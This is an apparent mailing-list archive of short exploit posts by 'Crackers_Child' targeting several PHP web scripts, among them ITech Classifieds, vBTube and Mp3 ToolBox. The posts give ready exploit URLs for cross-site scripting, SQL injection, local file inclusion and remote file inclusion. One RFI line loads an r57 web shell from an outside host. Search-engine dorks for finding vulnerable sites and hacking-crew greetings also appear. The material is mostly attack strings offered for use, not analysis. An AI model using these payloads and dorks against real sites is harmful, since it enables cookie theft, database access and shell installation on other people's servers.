ITech Classifieds Multiple Remote Vulnerabilities

2008-02-02 Thread cybermilitan
Title  : ITech Classifieds Multiple Remote Vulnerabilities


Author : Crackers_Child


Bug: SQL Injection + XSS


Demo   : http://itechclassifieds.com/demo/


Exp: /ViewCat.php?CatID=Alert(document.cookie)


Exp: /ViewCat.php?CatID=SQL Injection /*


Greetz :   www.aq.com www.sibersavascilar.comwww.biyofrm.com 


Domain Trader v2.0 Xss Vulnerable

2008-02-02 Thread cybermilitan

#


title :  Domain Trader v2.0 Xss Vulnerable


Author: Crackers_Child [ cybermilitan (at) hotmail (dot) com ]


Exploit   : 
www.site.com/script/catalog.php?mode=viewcategory&id=alert(document.cookie)


Dork  : Powered by Domain Trader v2.0 - Domain parking software 


Greetz: www.biyofrm.com & www.sibersavascilar.com


#


Amber Script 1.0 (show_content.php id) Local File Inclusion Vulnerability

2007-11-24 Thread cybermilitan
__By 
Crackers_Child___+


*

*

*[~] Script...:   Amber Script 1.0

*[~] Download.:   
http://rapidshare.com/files/54891799/Amber_Script_1.0.rar (Nulled)

*[~] Author...:   Crackers_Child  | [EMAIL PROTECTED] & [EMAIL 
PROTECTED]

*[~] Class:   Local File Inclusion

*[~] Demo.:   http://www.script4sale.info/demo/amber/

+___+



+___+

*

*

* 

*

*   [~] Exploit Lfi...: 
http://[Taget]/[amber_path]/scripts/include/show_content.php?id=LFİ; %00

*

* 

+___+




[~] iNF0..:   F3CK Y0UR simple Lf3

  




+___+


+___+

*

*

*   [~] Special Thanx...:str0ke, BiyoSecurity.Net, 
SiberSavascilar.com And All F3ckers :)

*

+___+


vBTube v1.1 - Beta ( Vbulletin Tube) Xss Vulnerable

2007-11-24 Thread cybermilitan

--


title: vBTube v1.1 - Beta ( Vbulletin Tube) Xss Vulnerable


Author   : Crackers_Child [ [EMAIL PROTECTED] ]


Exploit  : vBTube.php?do=search&search=alert(document.cookie)


Dork : inurl:vBTube.php   ( inurl:vBTube.php için yaklaşık 
120.000 sonuçtan)


Greetz   : www.biyofrm.com & www.sibersavascilar.com



--


Mp3 ToolBox 1.0 beta 5 Remote File İnclude Vulnerability

2007-11-23 Thread cybermilitan
+__By 
Crackers_Child___+


*

*

*[~] Script...:   Mp3 ToolBox 1.0 beta 5

*[~] Download.:   
http://www.radiotoolbox.com/downloads/mp3toolbox/mp3_toolbox_beta-5.zip

*[~] Author...:   Crackers_Child  | [EMAIL PROTECTED] & [EMAIL 
PROTECTED]

*[~] Class:   Remote File İnclude Vulnerability

*[~] Dork.:   intitle:Mp3 ToolBox 1.0

+___+



+___+

*

*

* 

*

*   [~] Exploit Rfi...: 
http://[Taget]/[Path]/index.php?skin_file=http://sibersavascilar.com/shelz/r57.txt?

*

* 

+___+




[~] Vulnerable..:   include($skin_file);

  




+___+


+___+

*

*

*   [~] Special Thanx...:str0ke, BiyoSecurity.Net, 
SiberSavascilar.com And All F3ckers :)

*

+___+
  


Trackeur v.1 Remote File İnclude Bug

2007-08-15 Thread cybermilitan

///


Trackeur v.1 Remote File İnclude Bug

///

Author : Crackers_Child

///


Contact : [EMAIL PROTECTED] & http://karanliktaoynayanlar.com & 
http://biyosecurity.net & Yollubunlar.org (CashAsiq)

///

Script : http://www.scriptheque.com/download.php?sid=1266

///

bug 

include($header);

///


Exploit: site.com/script_path/tracking.php?header=Sh3ll?

///

Not : Cra Fena Siker :) 

///


Systme de vote en temps rel v1.0 Remote File include Bug

2007-08-15 Thread cybermilitan


Système de vote en temps réel v1.0 Remote File İnclude Bug


 
Author : Crackers_Child



Contact : [EMAIL PROTECTED] & http://karanliktaoynayanlar.com & 
http://biyosecurity.net & Yollubunlar.org (CashAsiq)



Script:http://www.scriptheque.com/download.php?sid=1665



İn depouilg.php3



Include($NomVote.".ini");

Include($FilePalHex);



Exploit  : site.com/script_path/depouilg.php3?NomVote=



Exploit2 : site.com/script_path/depouilg.php3?FilePalHex=




Note: Cra Fenar Siker Haaa :)